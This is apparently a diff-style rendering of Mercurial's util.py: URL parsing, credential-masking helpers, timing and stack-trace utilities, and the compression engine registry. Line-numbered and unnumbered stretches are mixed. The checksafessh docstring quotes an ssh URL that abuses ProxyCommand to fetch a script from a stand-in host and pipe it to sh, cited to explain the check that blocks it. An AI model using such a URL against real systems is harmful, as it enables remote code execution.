2806 return socket.getservbyname(pycompat.sysstr(port))
2809 except socket.error:
2807 except socket.error:
2810 raise error.Abort(_("no port number associated with service '%s'")
2808 raise error.Abort(_("no port number associated with service '%s'")
2811 % port)
2809 % port)
2812
2810
2813 class url(object):
2811 class url(object):
2814 r"""Reliable URL parser.
2812 r"""Reliable URL parser.
2815
2813
2816 This parses URLs and provides attributes for the following
2814 This parses URLs and provides attributes for the following
2817 components:
2815 components:
2818
2816
2819 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2817 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2820
2818
2821 Missing components are set to None. The only exception is
2819 Missing components are set to None. The only exception is
2822 fragment, which is set to '' if present but empty.
2820 fragment, which is set to '' if present but empty.
2823
2821
2824 If parsefragment is False, fragment is included in query. If
2822 If parsefragment is False, fragment is included in query. If
2825 parsequery is False, query is included in path. If both are
2823 parsequery is False, query is included in path. If both are
2826 False, both fragment and query are included in path.
2824 False, both fragment and query are included in path.
2827
2825
2828 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2826 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2829
2827
2830 Note that for backward compatibility reasons, bundle URLs do not
2828 Note that for backward compatibility reasons, bundle URLs do not
2831 take host names. That means 'bundle://../' has a path of '../'.
2829 take host names. That means 'bundle://../' has a path of '../'.
2832
2830
2833 Examples:
2831 Examples:
2834
2832
2835 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2833 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2836 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2834 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2837 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2835 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2838 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2836 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2839 >>> url(b'file:///home/joe/repo')
2837 >>> url(b'file:///home/joe/repo')
2840 <url scheme: 'file', path: '/home/joe/repo'>
2838 <url scheme: 'file', path: '/home/joe/repo'>
2841 >>> url(b'file:///c:/temp/foo/')
2839 >>> url(b'file:///c:/temp/foo/')
2842 <url scheme: 'file', path: 'c:/temp/foo/'>
2840 <url scheme: 'file', path: 'c:/temp/foo/'>
2843 >>> url(b'bundle:foo')
2841 >>> url(b'bundle:foo')
2844 <url scheme: 'bundle', path: 'foo'>
2842 <url scheme: 'bundle', path: 'foo'>
2845 >>> url(b'bundle://../foo')
2843 >>> url(b'bundle://../foo')
2846 <url scheme: 'bundle', path: '../foo'>
2844 <url scheme: 'bundle', path: '../foo'>
2847 >>> url(br'c:\foo\bar')
2845 >>> url(br'c:\foo\bar')
2848 <url path: 'c:\\foo\\bar'>
2846 <url path: 'c:\\foo\\bar'>
2849 >>> url(br'\\blah\blah\blah')
2847 >>> url(br'\\blah\blah\blah')
2850 <url path: '\\\\blah\\blah\\blah'>
2848 <url path: '\\\\blah\\blah\\blah'>
2851 >>> url(br'\\blah\blah\blah#baz')
2849 >>> url(br'\\blah\blah\blah#baz')
2852 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2850 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2853 >>> url(br'file:///C:\users\me')
2851 >>> url(br'file:///C:\users\me')
2854 <url scheme: 'file', path: 'C:\\users\\me'>
2852 <url scheme: 'file', path: 'C:\\users\\me'>
2855
2853
2856 Authentication credentials:
2854 Authentication credentials:
2857
2855
2858 >>> url(b'ssh://joe:xyz@x/repo')
2856 >>> url(b'ssh://joe:xyz@x/repo')
2859 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2857 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2860 >>> url(b'ssh://joe@x/repo')
2858 >>> url(b'ssh://joe@x/repo')
2861 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2859 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2862
2860
2863 Query strings and fragments:
2861 Query strings and fragments:
2864
2862
2865 >>> url(b'http://host/a?b#c')
2863 >>> url(b'http://host/a?b#c')
2866 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2864 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2867 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2865 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2868 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2866 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2869
2867
2870 Empty path:
2868 Empty path:
2871
2869
2872 >>> url(b'')
2870 >>> url(b'')
2873 <url path: ''>
2871 <url path: ''>
2874 >>> url(b'#a')
2872 >>> url(b'#a')
2875 <url path: '', fragment: 'a'>
2873 <url path: '', fragment: 'a'>
2876 >>> url(b'http://host/')
2874 >>> url(b'http://host/')
2877 <url scheme: 'http', host: 'host', path: ''>
2875 <url scheme: 'http', host: 'host', path: ''>
2878 >>> url(b'http://host/#a')
2876 >>> url(b'http://host/#a')
2879 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2877 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2880
2878
2881 Only scheme:
2879 Only scheme:
2882
2880
2883 >>> url(b'http:')
2881 >>> url(b'http:')
2884 <url scheme: 'http'>
2882 <url scheme: 'http'>
2885 """
2883 """
2886
2884
2887 _safechars = "!~*'()+"
2885 _safechars = "!~*'()+"
2888 _safepchars = "/!~*'()+:\\"
2886 _safepchars = "/!~*'()+:\\"
2889 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2887 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2890
2888
    def __init__(self, path, parsequery=True, parsefragment=True):
        """Parse *path* into scheme/user/passwd/host/port/path/query/fragment.

        parsequery/parsefragment control whether '?' and '#' are treated
        as delimiters or left embedded in the path.  Windows drive
        letters, UNC paths and 'bundle:' URLs are special-cased as
        local paths rather than parsed as generic URLs.
        """
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                # No scheme was recognized: the whole string is a
                # filesystem path; query/fragment parsing does not apply.
                self.path = path
                return

            if parsequery and '?' in path:
                path, self.query = path.split('?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith('//'):
                parts = path[2:].split('/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = '/' + path

            if self.host and '@' in self.host:
                # rsplit so a '@' inside the password is kept with it.
                self.user, self.host = self.host.rsplit('@', 1)
                if ':' in self.user:
                    self.user, self.passwd = self.user.split(':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (self.host and ':' in self.host and
                not (self.host.startswith('[') and self.host.endswith(']'))):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(':', 1)
                if not self.host:
                    self.host = None

            if (self.host and self.scheme == 'file' and
                self.host not in ('localhost', '127.0.0.1', '[::1]')):
                raise error.Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))
2982
2980
2983 @encoding.strmethod
2981 @encoding.strmethod
2984 def __repr__(self):
2982 def __repr__(self):
2985 attrs = []
2983 attrs = []
2986 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2984 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2987 'query', 'fragment'):
2985 'query', 'fragment'):
2988 v = getattr(self, a)
2986 v = getattr(self, a)
2989 if v is not None:
2987 if v is not None:
2990 attrs.append('%s: %r' % (a, v))
2988 attrs.append('%s: %r' % (a, v))
2991 return '<url %s>' % ', '.join(attrs)
2989 return '<url %s>' % ', '.join(attrs)
2992
2990
    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            # Local paths round-trip unquoted; only the optional
            # 'bundle:' prefix and fragment are re-attached.
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            # Hostless file-style URL: file:///path (extra '/' before a
            # drive letter so file:///c:/x round-trips).
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            # Bracketed IPv6 literals must not be percent-quoted.
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
            if self.port:
                s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)
3071
3069
3072 def authinfo(self):
3070 def authinfo(self):
3073 user, passwd = self.user, self.passwd
3071 user, passwd = self.user, self.passwd
3074 try:
3072 try:
3075 self.user, self.passwd = None, None
3073 self.user, self.passwd = None, None
3076 s = bytes(self)
3074 s = bytes(self)
3077 finally:
3075 finally:
3078 self.user, self.passwd = user, passwd
3076 self.user, self.passwd = user, passwd
3079 if not self.user:
3077 if not self.user:
3080 return (s, None)
3078 return (s, None)
3081 # authinfo[1] is passed to urllib2 password manager, and its
3079 # authinfo[1] is passed to urllib2 password manager, and its
3082 # URIs must not contain credentials. The host is passed in the
3080 # URIs must not contain credentials. The host is passed in the
3083 # URIs list because Python < 2.4.3 uses only that to search for
3081 # URIs list because Python < 2.4.3 uses only that to search for
3084 # a password.
3082 # a password.
3085 return (s, (None, (s, self.host),
3083 return (s, (None, (s, self.host),
3086 self.user, self.passwd or ''))
3084 self.user, self.passwd or ''))
3087
3085
3088 def isabs(self):
3086 def isabs(self):
3089 if self.scheme and self.scheme != 'file':
3087 if self.scheme and self.scheme != 'file':
3090 return True # remote URL
3088 return True # remote URL
3091 if hasdriveletter(self.path):
3089 if hasdriveletter(self.path):
3092 return True # absolute for our purposes - can't be joined()
3090 return True # absolute for our purposes - can't be joined()
3093 if self.path.startswith(br'\\'):
3091 if self.path.startswith(br'\\'):
3094 return True # Windows UNC path
3092 return True # Windows UNC path
3095 if self.path.startswith('/'):
3093 if self.path.startswith('/'):
3096 return True # POSIX-style
3094 return True # POSIX-style
3097 return False
3095 return False
3098
3096
3099 def localpath(self):
3097 def localpath(self):
3100 if self.scheme == 'file' or self.scheme == 'bundle':
3098 if self.scheme == 'file' or self.scheme == 'bundle':
3101 path = self.path or '/'
3099 path = self.path or '/'
3102 # For Windows, we need to promote hosts containing drive
3100 # For Windows, we need to promote hosts containing drive
3103 # letters to paths with drive letters.
3101 # letters to paths with drive letters.
3104 if hasdriveletter(self._hostport):
3102 if hasdriveletter(self._hostport):
3105 path = self._hostport + '/' + self.path
3103 path = self._hostport + '/' + self.path
3106 elif (self.host is not None and self.path
3104 elif (self.host is not None and self.path
3107 and not hasdriveletter(path)):
3105 and not hasdriveletter(path)):
3108 path = '/' + path
3106 path = '/' + path
3109 return path
3107 return path
3110 return self._origpath
3108 return self._origpath
3111
3109
3112 def islocal(self):
3110 def islocal(self):
3113 '''whether localpath will return something that posixfile can open'''
3111 '''whether localpath will return something that posixfile can open'''
3114 return (not self.scheme or self.scheme == 'file'
3112 return (not self.scheme or self.scheme == 'file'
3115 or self.scheme == 'bundle')
3113 or self.scheme == 'bundle')
3116
3114
def hasscheme(path):
    """Report whether *path* carries a URL scheme prefix (e.g. 'http:')."""
    parsed = url(path)
    return bool(parsed.scheme)
3119
3117
def hasdriveletter(path):
    """True-ish if *path* begins with a Windows drive letter like 'c:'.

    An empty/None path is returned unchanged (falsy), matching the
    original and-chain semantics.
    """
    if not path:
        return path
    return path[1:2] == ':' and path[0:1].isalpha()
3122
3120
def urllocalpath(path):
    """Return the local filesystem path for *path*, parsed without
    query/fragment splitting."""
    parsed = url(path, parsequery=False, parsefragment=False)
    return parsed.localpath()
3125
3123
def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    ssh parses a leading dash in the host as a command-line option, so
    e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path would run
    arbitrary commands.  Reject such urls outright and warn the user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    # startswith accepts a tuple: check plain and svn-over-ssh schemes.
    if path.startswith(('ssh://-', 'svn+ssh://-')):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (pycompat.bytestr(path),))
3140
3138
def hidepassword(u):
    '''hide user credential in a url string'''
    parsed = url(u)
    if parsed.passwd:
        # Mask, rather than drop, so the URL shape stays recognizable.
        parsed.passwd = '***'
    return bytes(parsed)
3147
3145
def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    # Render back via bytes() to match hidepassword(); str() would
    # produce a unicode str on Python 3 while this API deals in bytes.
    return bytes(u)
3153
3151
# Human-readable elapsed-time formatter: each (digits, divisor, format)
# row picks the coarsest unit (s, ms, us, ns) that still shows the
# requested number of significant digits.
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
)

# Current indentation depth (in spaces) for nested @timed reports;
# a one-element list so nested wrapper closures can mutate it.
_timenesting = [0]
3171
3169
def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def timedcall(*args, **kwargs):
        indent = 2
        starttime = timer()
        # Bump nesting so inner @timed calls report further indented.
        _timenesting[0] += indent
        try:
            return func(*args, **kwargs)
        finally:
            duration = timer() - starttime
            _timenesting[0] -= indent
            stderr.write('%s%s: %s\n' %
                         (' ' * _timenesting[0], func.__name__,
                          timecount(duration)))
    return timedcall
3196
3194
# Size suffixes recognized by sizetoint(), longest-match-irrelevant
# order preserved ('m' before 'mb' is fine because of endswith checks).
_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    spec = s.strip().lower()
    try:
        for suffix, multiplier in _sizeunits:
            if spec.endswith(suffix):
                return int(float(spec[:-len(suffix)]) * multiplier)
        # No suffix: a plain integer byte count.
        return int(spec)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)
3218
3216
class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        # List of (source, callable) pairs; sorted lazily on call.
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        # Re-sort on every invocation so late registrations are honored.
        self._hooks.sort(key=lambda entry: entry[0])
        return [hookfn(*args) for _source, hookfn in self._hooks]
3236
3234
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then return the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not be used in production code but very convenient while developing.
    '''
    frames = traceback.extract_stack()[:-skip - 1]
    entries = []
    for fn, lineno, funcname, _text in frames:
        entries.append((fileline % (pycompat.sysbytes(fn), lineno),
                        pycompat.sysbytes(funcname)))
    # depth == 0 keeps everything ([-0:] is the whole list).
    entries = entries[-depth:]
    if not entries:
        return
    fnmax = max(len(location) for location, _func in entries)
    for location, funcname in entries:
        if line is None:
            yield (fnmax, location, funcname)
        else:
            yield line % (fnmax, location, funcname)
3259
3257
def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then show 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not be used in production code but very convenient while developing.
    '''
    if otherf:
        # Flush the other stream first so output does not interleave.
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    # skip + 1 hides this frame itself from the report.
    for frameline in getstackframes(skip + 1, depth=depth):
        f.write(frameline)
    f.flush()
3274
3272
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            # dirstate-style mapping: each value's first element is a
            # state byte, compared against 'skip' to filter entries.
            for fname, entry in map.iteritems():
                if entry[0] != skip:
                    addpath(fname)
        else:
            for fname in map:
                addpath(fname)

    def addpath(self, path):
        counts = self._dirs
        for base in finddirs(path):
            if base in counts:
                # Every shallower ancestor is already counted; stop here.
                counts[base] += 1
                return
            counts[base] = 1

    def delpath(self, path):
        counts = self._dirs
        for base in finddirs(path):
            if counts[base] > 1:
                # Shallower ancestors keep their counts; stop here.
                counts[base] -= 1
                return
            del counts[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs
3310
3308
# Prefer the C implementation of dirs when the parsers module exposes one.
if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs
3313
3311
def finddirs(path):
    """Yield each ancestor directory of *path*, deepest first.

    'a/b/c' yields 'a/b' then 'a'; a path with no '/' yields nothing.
    """
    sep = path.rfind('/')
    while sep != -1:
        yield path[:sep]
        sep = path.rfind('/', 0, sep)
3319
3317
3320 # compression code
3318 # compression code
3321
3319
# Role identifiers used when querying wire-protocol compression support.
SERVERROLE = 'server'
CLIENTROLE = 'client'

# Describes an engine's wire-protocol support: its wire name plus its
# priority when acting as server and as client.
compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))
3328
3326
3329 class compressormanager(object):
3327 class compressormanager(object):
3330 """Holds registrations of various compression engines.
3328 """Holds registrations of various compression engines.
3331
3329
3332 This class essentially abstracts the differences between compression
3330 This class essentially abstracts the differences between compression
3333 engines to allow new compression formats to be added easily, possibly from
3331 engines to allow new compression formats to be added easily, possibly from
3334 extensions.
3332 extensions.
3335
3333
3336 Compressors are registered against the global instance by calling its
3334 Compressors are registered against the global instance by calling its
3337 ``register()`` method.
3335 ``register()`` method.
3338 """
3336 """
3339 def __init__(self):
3337 def __init__(self):
3340 self._engines = {}
3338 self._engines = {}
3341 # Bundle spec human name to engine name.
3339 # Bundle spec human name to engine name.
3342 self._bundlenames = {}
3340 self._bundlenames = {}
3343 # Internal bundle identifier to engine name.
3341 # Internal bundle identifier to engine name.
3344 self._bundletypes = {}
3342 self._bundletypes = {}
3345 # Revlog header to engine name.
3343 # Revlog header to engine name.
3346 self._revlogheaders = {}
3344 self._revlogheaders = {}
3347 # Wire proto identifier to engine name.
3345 # Wire proto identifier to engine name.
3348 self._wiretypes = {}
3346 self._wiretypes = {}
3349
3347
3350 def __getitem__(self, key):
3348 def __getitem__(self, key):
3351 return self._engines[key]
3349 return self._engines[key]
3352
3350
3353 def __contains__(self, key):
3351 def __contains__(self, key):
3354 return key in self._engines
3352 return key in self._engines
3355
3353
3356 def __iter__(self):
3354 def __iter__(self):
3357 return iter(self._engines.keys())
3355 return iter(self._engines.keys())
3358
3356
    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.

        Aborts if the engine's name, bundle name/type, wire-protocol
        name, or revlog header collides with an earlier registration.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        # All validation passed: commit the primary registration last.
        self._engines[name] = engine
3409
3407
3410 @property
3408 @property
3411 def supportedbundlenames(self):
3409 def supportedbundlenames(self):
3412 return set(self._bundlenames.keys())
3410 return set(self._bundlenames.keys())
3413
3411
3414 @property
3412 @property
3415 def supportedbundletypes(self):
3413 def supportedbundletypes(self):
3416 return set(self._bundletypes.keys())
3414 return set(self._bundletypes.keys())
3417
3415
3418 def forbundlename(self, bundlename):
3416 def forbundlename(self, bundlename):
3419 """Obtain a compression engine registered to a bundle name.
3417 """Obtain a compression engine registered to a bundle name.
3420
3418
3421 Will raise KeyError if the bundle type isn't registered.
3419 Will raise KeyError if the bundle type isn't registered.
3422
3420
3423 Will abort if the engine is known but not available.
3421 Will abort if the engine is known but not available.
3424 """
3422 """
3425 engine = self._engines[self._bundlenames[bundlename]]
3423 engine = self._engines[self._bundlenames[bundlename]]
3426 if not engine.available():
3424 if not engine.available():
3427 raise error.Abort(_('compression engine %s could not be loaded') %
3425 raise error.Abort(_('compression engine %s could not be loaded') %
3428 engine.name())
3426 engine.name())
3429 return engine
3427 return engine
3430
3428
3431 def forbundletype(self, bundletype):
3429 def forbundletype(self, bundletype):
3432 """Obtain a compression engine registered to a bundle type.
3430 """Obtain a compression engine registered to a bundle type.
3433
3431
3434 Will raise KeyError if the bundle type isn't registered.
3432 Will raise KeyError if the bundle type isn't registered.
3435
3433
3436 Will abort if the engine is known but not available.
3434 Will abort if the engine is known but not available.
3437 """
3435 """
3438 engine = self._engines[self._bundletypes[bundletype]]
3436 engine = self._engines[self._bundletypes[bundletype]]
3439 if not engine.available():
3437 if not engine.available():
3440 raise error.Abort(_('compression engine %s could not be loaded') %
3438 raise error.Abort(_('compression engine %s could not be loaded') %
3441 engine.name())
3439 engine.name())
3442 return engine
3440 return engine
3443
3441
3444 def supportedwireengines(self, role, onlyavailable=True):
3442 def supportedwireengines(self, role, onlyavailable=True):
3445 """Obtain compression engines that support the wire protocol.
3443 """Obtain compression engines that support the wire protocol.
3446
3444
3447 Returns a list of engines in prioritized order, most desired first.
3445 Returns a list of engines in prioritized order, most desired first.
3448
3446
3449 If ``onlyavailable`` is set, filter out engines that can't be
3447 If ``onlyavailable`` is set, filter out engines that can't be
3450 loaded.
3448 loaded.
3451 """
3449 """
3452 assert role in (SERVERROLE, CLIENTROLE)
3450 assert role in (SERVERROLE, CLIENTROLE)
3453
3451
3454 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3452 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3455
3453
3456 engines = [self._engines[e] for e in self._wiretypes.values()]
3454 engines = [self._engines[e] for e in self._wiretypes.values()]
3457 if onlyavailable:
3455 if onlyavailable:
3458 engines = [e for e in engines if e.available()]
3456 engines = [e for e in engines if e.available()]
3459
3457
3460 def getkey(e):
3458 def getkey(e):
3461 # Sort first by priority, highest first. In case of tie, sort
3459 # Sort first by priority, highest first. In case of tie, sort
3462 # alphabetically. This is arbitrary, but ensures output is
3460 # alphabetically. This is arbitrary, but ensures output is
3463 # stable.
3461 # stable.
3464 w = e.wireprotosupport()
3462 w = e.wireprotosupport()
3465 return -1 * getattr(w, attr), w.name
3463 return -1 * getattr(w, attr), w.name
3466
3464
3467 return list(sorted(engines, key=getkey))
3465 return list(sorted(engines, key=getkey))
3468
3466
3469 def forwiretype(self, wiretype):
3467 def forwiretype(self, wiretype):
3470 engine = self._engines[self._wiretypes[wiretype]]
3468 engine = self._engines[self._wiretypes[wiretype]]
3471 if not engine.available():
3469 if not engine.available():
3472 raise error.Abort(_('compression engine %s could not be loaded') %
3470 raise error.Abort(_('compression engine %s could not be loaded') %
3473 engine.name())
3471 engine.name())
3474 return engine
3472 return engine
3475
3473
3476 def forrevlogheader(self, header):
3474 def forrevlogheader(self, header):
3477 """Obtain a compression engine registered to a revlog header.
3475 """Obtain a compression engine registered to a revlog header.
3478
3476
3479 Will raise KeyError if the revlog header value isn't registered.
3477 Will raise KeyError if the revlog header value isn't registered.
3480 """
3478 """
3481 return self._engines[self._revlogheaders[header]]
3479 return self._engines[self._revlogheaders[header]]
3482
3480
3483 compengines = compressormanager()
3481 compengines = compressormanager()
3484
3482
3485 class compressionengine(object):
3483 class compressionengine(object):
3486 """Base class for compression engines.
3484 """Base class for compression engines.
3487
3485
3488 Compression engines must implement the interface defined by this class.
3486 Compression engines must implement the interface defined by this class.
3489 """
3487 """
3490 def name(self):
3488 def name(self):
3491 """Returns the name of the compression engine.
3489 """Returns the name of the compression engine.
3492
3490
3493 This is the key the engine is registered under.
3491 This is the key the engine is registered under.
3494
3492
3495 This method must be implemented.
3493 This method must be implemented.
3496 """
3494 """
3497 raise NotImplementedError()
3495 raise NotImplementedError()
3498
3496
3499 def available(self):
3497 def available(self):
3500 """Whether the compression engine is available.
3498 """Whether the compression engine is available.
3501
3499
3502 The intent of this method is to allow optional compression engines
3500 The intent of this method is to allow optional compression engines
3503 that may not be available in all installations (such as engines relying
3501 that may not be available in all installations (such as engines relying
3504 on C extensions that may not be present).
3502 on C extensions that may not be present).
3505 """
3503 """
3506 return True
3504 return True
3507
3505
3508 def bundletype(self):
3506 def bundletype(self):
3509 """Describes bundle identifiers for this engine.
3507 """Describes bundle identifiers for this engine.
3510
3508
3511 If this compression engine isn't supported for bundles, returns None.
3509 If this compression engine isn't supported for bundles, returns None.
3512
3510
3513 If this engine can be used for bundles, returns a 2-tuple of strings of
3511 If this engine can be used for bundles, returns a 2-tuple of strings of
3514 the user-facing "bundle spec" compression name and an internal
3512 the user-facing "bundle spec" compression name and an internal
3515 identifier used to denote the compression format within bundles. To
3513 identifier used to denote the compression format within bundles. To
3516 exclude the name from external usage, set the first element to ``None``.
3514 exclude the name from external usage, set the first element to ``None``.
3517
3515
3518 If bundle compression is supported, the class must also implement
